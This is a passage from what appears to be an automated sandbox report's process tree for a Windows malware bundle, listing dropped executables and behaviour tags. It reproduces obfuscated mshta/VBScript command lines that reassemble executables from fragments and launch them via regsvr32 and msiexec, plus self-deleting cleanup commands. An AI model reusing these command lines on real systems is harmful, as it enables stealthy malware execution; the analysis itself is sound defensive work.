                                                                                                            • C:\Users\Admin\AppData\Local\Temp\inst2.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4368
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4548
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5708
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4400
                                                                                                              • C:\Users\Admin\AppData\Roaming\6542857.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\6542857.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5792
                                                                                                              • C:\Users\Admin\AppData\Roaming\8180237.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\8180237.exe"
                                                                                                                6⤵
                                                                                                                  PID:5300
                                                                                                                • C:\Users\Admin\AppData\Roaming\7778437.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\7778437.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:3784
                                                                                                                • C:\Users\Admin\AppData\Roaming\7690791.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\7690791.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:4856
                                                                                                                • C:\Users\Admin\AppData\Roaming\7288991.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\7288991.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3968
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\7288991.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\7288991.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                    7⤵
                                                                                                                      PID:4276
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\7288991.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\7288991.exe") do taskkill /im "%~nxT" /f
                                                                                                                        8⤵
                                                                                                                          PID:5140
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                                                            LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3488
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                              10⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              PID:6096
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                                                11⤵
                                                                                                                                  PID:1924
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                                                10⤵
                                                                                                                                  PID:5392
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                    11⤵
                                                                                                                                      PID:3852
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                        12⤵
                                                                                                                                          PID:6448
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
                                                                                                                                          12⤵
                                                                                                                                            PID:6480
                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                            12⤵
                                                                                                                                              PID:4484
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im "7288991.exe" /f
                                                                                                                                        9⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:716
                                                                                                                                • C:\Users\Admin\AppData\Roaming\8730253.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8730253.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:6096
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5388
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8416803.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8416803.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4892
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1532
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    6⤵
                                                                                                                                      PID:4476
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im Soft1WW01.exe /f
                                                                                                                                        7⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:6396
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        7⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5424
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\yangtao-game.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\yangtao-game.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2348
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4964
                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                      6⤵
                                                                                                                                        PID:4944
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                          7⤵
                                                                                                                                            PID:5132
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                              ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                              8⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5868
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                9⤵
                                                                                                                                                  PID:392
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:5856
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5048
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                        10⤵
                                                                                                                                                          PID:4664
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                            11⤵
                                                                                                                                                              PID:6388
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6440
                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                11⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:5140
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                          8⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:5396
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5080
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4424
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 788
                                                                                                                                                      6⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4892
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 804
                                                                                                                                                      6⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4852
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 776
                                                                                                                                                      6⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6092
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 772
                                                                                                                                                      6⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5484
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 940
                                                                                                                                                      6⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5692
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1292
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      PID:4760
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                        7⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:6764
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x194,0x198,0x1c4,0x1a8,0x1e8,0x7ffcd744dec0,0x7ffcd744ded0,0x7ffcd744dee0
                                                                                                                                                          8⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6724
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1504,1675274890544613042,6518277520280393412,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6764_110338339" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:2
                                                                                                                                                          8⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2312
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,1675274890544613042,6518277520280393412,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6764_110338339" --mojo-platform-channel-handle=1836 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1880
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2864
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5280
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5364
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\28.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1180
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\YLziIR76wkS0BQ6OIixd8dVV.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\YLziIR76wkS0BQ6OIixd8dVV.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:1088
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    PID:5640
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                      5⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:6656
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ffcd744dec0,0x7ffcd744ded0,0x7ffcd744dee0
                                                                                                                                                        6⤵
                                                                                                                                                          PID:836
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1520,5220798942025682948,13526396881164526386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6656_1005450758" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1536 /prefetch:2
                                                                                                                                                          6⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6740
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,5220798942025682948,13526396881164526386,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6656_1005450758" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6480
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2212
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4432
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\gcGJT35GfReKPFjp9zAzyIhR.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5052
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:612
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4640
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:5144
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5696
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:4344
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:5800
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:5496
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:1780
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill -im "gcGJT35GfReKPFjp9zAzyIhR.exe" -F
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:5208
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\nsbW2oD3A42cgPmQaK8W_DUQ.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\nsbW2oD3A42cgPmQaK8W_DUQ.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:2244
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\nsbW2oD3A42cgPmQaK8W_DUQ.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\nsbW2oD3A42cgPmQaK8W_DUQ.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          PID:6236
